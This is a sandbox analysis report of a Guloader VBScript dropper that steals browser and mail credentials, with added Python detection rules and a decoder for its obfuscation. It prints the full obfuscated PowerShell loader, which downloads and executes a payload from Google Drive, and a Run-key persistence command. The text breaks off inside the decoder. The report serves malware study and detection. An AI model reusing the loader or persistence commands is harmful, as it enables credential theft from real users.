Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-05-2024 15:42
Static task: static1
Behavioral task: behavioral1
  Sample: Swift 2024052130819616.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: Swift 2024052130819616.vbs
  Resource: win10v2004-20240426-en
General
Target: Swift 2024052130819616.vbs
Size: 13KB
MD5: 693d91041a54a578ada0c38a77634ee9
SHA1: 13e0a6c85203356af7d11ff4a0e74a6b9637f466
SHA256: bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91
SHA512: 110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb
SSDEEP: 192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- NirSoft MailPassView (1 IoC)
  Password recovery tool for various email clients.
  yara rule MailPassView: behavioral2/memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp
- NirSoft WebBrowserPassView (1 IoC)
  Password recovery tool for various web browsers.
  yara rule WebBrowserPassView: behavioral2/memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp
- Nirsoft (3 IoCs)
  yara rule Nirsoft:
    behavioral2/memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp
    behavioral2/memory/5044-73-0x0000000000400000-0x0000000000424000-memory.dmp
    behavioral2/memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp
  The three hits are the wab.exe children started with /stext in the process tree (PIDs 2088, 5072, 5044). /stext is NirSoft's "save report as text file" switch, so the temp file named on each command line is where the recovered credentials are written.
- Blocklisted process makes network request (2 IoCs)
  flow 8: pid 2168 powershell.exe
  flow 13: pid 2168 powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  WScript.exe: key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation
- Accesses Microsoft Outlook accounts (1 TTP, 1 IoC)
  wab.exe: key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
- Adds Run key to start application (2 TTPs, 1 IoC)
  reg.exe: set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)"
  The value is written as REG_EXPAND_SZ, so %Siestas% is expanded when the Run entry fires at logon. -w 1 is PowerShell's -WindowStyle Hidden, so %Siestas% is presumably a PowerShell path, and the real payload is whatever is stored in the Semimachine value under HKCU:\Disputeredes. Neither the environment variable nor that registry value is shown in this report; both are worth pulling from the host when hunting.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  The IoC details are not included on this page.
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid 3680 wab.exe (2 calls)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 784 powershell.exe; pid 3680 wab.exe
- Suspicious use of SetThreadContext (4 IoCs)
  PID 784 powershell.exe set thread context of 3680 wab.exe
  PID 3680 wab.exe set thread context of 2088 wab.exe
  PID 3680 wab.exe set thread context of 5072 wab.exe
  PID 3680 wab.exe set thread context of 5044 wab.exe
  Each of these pairs also appears under MapViewOfSection and WriteProcessMemory below: the parent creates the child, writes a new image into it and redirects execution with SetThreadContext, which is process hollowing. The 32-bit PowerShell (784) hollows wab.exe (3680), and that wab.exe hollows its three /stext children with the NirSoft tools matched above. PID 4248 received WriteProcessMemory from 3680 but no SetThreadContext and shows no further activity; 5072 was then started with the same /stext output path.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTP, 1 IoC)
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid 2168 powershell.exe (2), 784 powershell.exe (4), 2088 wab.exe (4), 5044 wab.exe (2)
- Suspicious behavior: MapViewOfSection (5 IoCs)
  pid 784 powershell.exe (1), 3680 wab.exe (4)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token SeDebugPrivilege: 2168 powershell.exe, 784 powershell.exe, 5044 wab.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3680 wab.exe
- Suspicious use of WriteProcessMemory (40 IoCs)
  source -> target (number of writes):
  3936 WScript.exe -> 4700 cmd.exe (2)
  4700 cmd.exe -> 1428 PING.EXE (2)
  3936 WScript.exe -> 2168 powershell.exe (2)
  2168 powershell.exe -> 4224 cmd.exe (2)
  2168 powershell.exe -> 784 powershell.exe (3)
  784 powershell.exe -> 4372 cmd.exe (3)
  784 powershell.exe -> 3680 wab.exe (5)
  3680 wab.exe -> 3692 cmd.exe (3)
  3692 cmd.exe -> 3408 reg.exe (3)
  3680 wab.exe -> 2088 wab.exe (4)
  3680 wab.exe -> 4248 wab.exe (3)
  3680 wab.exe -> 5072 wab.exe (4)
  3680 wab.exe -> 5044 wab.exe (4)
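The signatures above are isolated API observations; what makes them usable outside the sandbox is the parent/child shape of the chain. The following Python is an added example (not part of the sandbox report) that encodes each link of that chain as a rule and runs the rules over process-creation events constructed from this report's process tree, with PIDs, images and command lines as shown there. WScript's parent is not on the page, so ppid 0 is a placeholder, and the long PowerShell script is shortened to "..." because no rule reads it. Proc, detect, lineage and the rule identifiers are my names. Each rule stands on its own (script host to PowerShell, 64-bit to SysWOW64 PowerShell relaunch, ping under a script host, wab.exe started by a shell, wab.exe spawning wab.exe /stext, a REG_EXPAND_SZ Run value built from an environment variable plus Get-ItemProperty), so a hit is actionable even where the sandbox-only signals such as SetThreadContext and MapViewOfSection are not in your telemetry.

```python
"""Detection logic for the process chain in this report, run over
process-creation events constructed from the report's tree. Added example,
not part of the sandbox report; field names follow Sysmon Event ID 1."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


WAB = r"C:\Program Files (x86)\windows mail\wab.exe"
TMP = r"C:\Users\Admin\AppData\Local\Temp"
REG_ADD = (r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ '''
           r'''/d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"''')

# Constructed from the report's process tree. WScript's parent is not on the
# page (ppid 0 is a placeholder); the PowerShell script is shortened to "...".
EVENTS = [
    Proc(3936, 0, r"C:\Windows\System32\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "' + TMP + r'\Swift 2024052130819616.vbs"'),
    Proc(4700, 3936, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ping 6777.6777.6777.677e"),
    Proc(1428, 4700, r"C:\Windows\system32\PING.EXE", "ping 6777.6777.6777.677e"),
    Proc(2168, 3936, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;..."'),
    Proc(4224, 2168, r"C:\Windows\system32\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"'),
    Proc(784, 2168, r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;..."'),
    Proc(4372, 784, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"'),
    Proc(3680, 784, WAB, '"' + WAB + '"'),
    Proc(3692, 3680, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    Proc(3408, 3692, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
    Proc(2088, 3680, WAB, '"' + WAB + r'" /stext "' + TMP + r'\bmnddfrn"'),
    Proc(4248, 3680, WAB, '"' + WAB + r'" /stext "' + TMP + r'\mgsweybhmfe"'),
    Proc(5072, 3680, WAB, '"' + WAB + r'" /stext "' + TMP + r'\mgsweybhmfe"'),
    Proc(5044, 3680, WAB, '"' + WAB + r'" /stext "' + TMP + r'\wjygfqmaioxwboe"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
ENV_VAR = re.compile(r"%\w+%")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image basenames from the root of the recorded tree down to pid."""
    by_pid = {p.pid: p for p in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def detect(events):
    """Return sorted (rule, pid) pairs; each rule is one link of the chain."""
    by_pid = {p.pid: p for p in events}
    hits = []
    for p in events:
        img, cl = basename(p.image), p.cmdline.lower()
        parent = by_pid.get(p.ppid)
        pimg = basename(parent.image) if parent else ""
        ancestors = lineage(events, p.pid)[:-1]
        # Script host launching PowerShell (WScript.exe -> powershell.exe).
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS:
            hits.append(("script_host_spawns_powershell", p.pid))
        # 64-bit PowerShell relaunching itself under SysWOW64 (needed for 32-bit injection).
        if (img == pimg == "powershell.exe" and "\\syswow64\\" in p.image.lower()
                and "\\syswow64\\" not in parent.image.lower()):
            hits.append(("powershell_relaunch_32bit", p.pid))
        # ping.exe anywhere under a script host: a delay, not diagnostics.
        if img == "ping.exe" and any(a in SCRIPT_HOSTS for a in ancestors):
            hits.append(("ping_under_script_host", p.pid))
        # wab.exe (Windows Mail) started by a shell or script host: injection target.
        if img == "wab.exe" and pimg in SHELLS | SCRIPT_HOSTS:
            hits.append(("wab_spawned_by_shell", p.pid))
        # wab.exe spawning wab.exe with NirSoft's /stext (save report as text).
        if img == pimg == "wab.exe" and "/stext" in cl:
            hits.append(("wab_child_stext_nirsoft", p.pid))
        # Run value of type REG_EXPAND_SZ whose data is an env-var launcher that
        # reads its payload from another registry value.
        if (img == "reg.exe" and RUN_KEY.search(p.cmdline) and "reg_expand_sz" in cl
                and ENV_VAR.search(p.cmdline) and "get-itemproperty" in cl):
            hits.append(("run_key_env_var_launcher", p.pid))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:<32} pid={pid:<5} lineage={' > '.join(lineage(EVENTS, pid))}")
```

Against Sysmon Event ID 1 or EDR process telemetry, map Image, ParentProcessId and CommandLine onto Proc and keep the rules as they are. The /stext rule is the cheapest to deploy broadly: /stext is a NirSoft command-line switch, not a wab.exe one, so wab.exe spawning itself with it has no benign explanation.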
Processes
Chain summary: WScript.exe runs the .vbs, which spawns cmd.exe /c ping against the unresolvable name 6777.6777.6777.677e (a delay/evasion trick) and then the 64-bit PowerShell with the obfuscated script below. That script re-executes itself under the 32-bit (SysWOW64) PowerShell, which starts wab.exe (Windows Mail) and injects into it; the SetThreadContext, MapViewOfSection and WriteProcessMemory signatures on the 784 -> 3680 pair are the process-hollowing pattern. The hollowed wab.exe (3680) writes the HKCU Run value "Kolinski" for persistence and then starts three wab.exe children with /stext, hollowing each in turn; the memory YARA hits identify them as NirSoft WebBrowserPassView (2088), MailPassView (5072) and a further NirSoft tool (5044), each writing its output to the temp file named on its command line. Tree depth is shown by indentation.

PID 3936  C:\Windows\System32\WScript.exe
  cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID 4700  C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /c ping 6777.6777.6777.677e
    - Suspicious use of WriteProcessMemory
    PID 1428  C:\Windows\system32\PING.EXE
      cmdline: ping 6777.6777.6777.677e
      - Runs ping.exe
  PID 2168  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 4224  C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
    PID 784  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same script string shown for PID 2168 above (the 64-bit PowerShell re-executes it under the 32-bit PowerShell; the string is identical and is not repeated here)
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID 4372  C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
        (The image path is SysWOW64\cmd.exe although the command line names System32: WOW64 file-system redirection for a 32-bit parent. The same applies to the cmd.exe and reg.exe below.)
      PID 3680  C:\Program Files (x86)\windows mail\wab.exe
        cmdline: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID 3692  C:\Windows\SysWOW64\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
          - Suspicious use of WriteProcessMemory
          PID 3408  C:\Windows\SysWOW64\reg.exe
            cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
            - Adds Run key to start application
            - Modifies registry key
        PID 2088  C:\Program Files (x86)\windows mail\wab.exe
          cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bmnddfrn"
          - Suspicious behavior: EnumeratesProcesses
        PID 4248  C:\Program Files (x86)\windows mail\wab.exe
          cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
          (No signatures: written to by 3680 but never given a new thread context; 5072 was then started with the same output path.)
        PID 5072  C:\Program Files (x86)\windows mail\wab.exe
          cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
          - Accesses Microsoft Outlook accounts
        PID 5044  C:\Program Files (x86)\windows mail\wab.exe
          cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wjygfqmaioxwboe"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
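The PowerShell command line above is obfuscated with a fixed-stride pick: Anspndelserne() walks each literal from index 7 in steps of 8 and keeps one character per step ($Skyldkreds = 1), so only every eighth character is payload and the rest is filler; Kend224 is a wrapper around $Truckful, which decodes to iex. The following Python is an added example (not part of the sandbox report) that re-implements that routine and decodes literals copied from the command line; decode, decode_literals, deobfuscate, COBSTONE and GLOBAL_ASSIGN are my names for the script's $Cobstone and the first Kend224 argument, and FRAGMENT is a constructed snippet in the script's shape. Decoded here: $Truckful is iex, $Ulivssaar is >, $Veldreven is User-Agent, $Cobstone is a Google Drive download URL (drive.google.com/uc?export=download&id=...), consistent with the legitimate-hosting signature above, and the first Kend224 call is $global:Marinernes=(cmd /c $Formaalsbestemmelserne), which is how the echo %appdata%\Narco.Fla cmd.exe children in the tree come about. One caveat: this page's text has collapsed runs of spaces, so longer literals such as $Forkamrenes (a Mozilla/5.0 User-Agent value) and $Formaalsbestemmelserne no longer decode cleanly from the page copy; the latter should yield exactly the child's command line echo %appdata%\Narco.Fla && echo t, which is a handy self-check. Decode from the original .vbs or a process-creation log when a result comes out garbled. Decoding the remaining literals the same way shows the loop downloading each URL in $Cobstone split on > (one here), sleeping 4 seconds and re-testing until %appdata%\Narco.Fla exists, then Get-Content on the file, FromBase64String, and .substring($Hypergenetic,$overelaborated) (offset 335367, length 30549) handed to iex as the next stage.

```python
"""Decoder for the string-stride obfuscation used by this sample's
PowerShell stage. Added example, not part of the sandbox report."""
import re

# Parameters taken from the script: $Skyldkreds = 1 is the substring length,
# the loop starts at index 7, advances by 8 and stops at Length - 1.
START, STEP, TAKE = 7, 8, 1


def decode(blob, start=START, step=STEP, take=TAKE):
    """Re-implementation of Anspndelserne(): concatenate Substring(i, take)
    for i = start, start+step, ... while i < len(blob) - take."""
    return "".join(blob[i:i + take] for i in range(start, len(blob) - take, step))


# Matches the obfuscated literals as they appear in the script.
LITERAL = re.compile(r"Anspndelserne\s+'([^']*)'")


def decode_literals(script):
    """Decode every Anspndelserne '...' literal in a script fragment, in order."""
    return [decode(m) for m in LITERAL.findall(script)]


def deobfuscate(script):
    """Replace each obfuscated literal with its quoted plaintext so the
    control flow can be read top to bottom."""
    return LITERAL.sub(lambda m: "'" + decode(m.group(1)) + "'", script)


# Literals copied from the report's PowerShell command line. Long ones are
# split into 64-character pieces (eight strides each) so the alignment can
# be checked by eye; Python joins adjacent string literals.
TRUCKFUL = "PushtuaiSuperhueStenf.uxK ypsis "            # $Truckful
ULIVSSAAR = " Hylac,>Retspri "                           # $Ulivssaar
VELDREVEN = (" Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g"  # $Veldreven
             " Po,tereHahnemanIndermatBullen ")
COBSTONE = (" MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/"  # $Cobstone
            "RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo"
            " llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionm"
            "Convers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemano"
            "DoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverl"
            "Missy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1"
            "ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enS"
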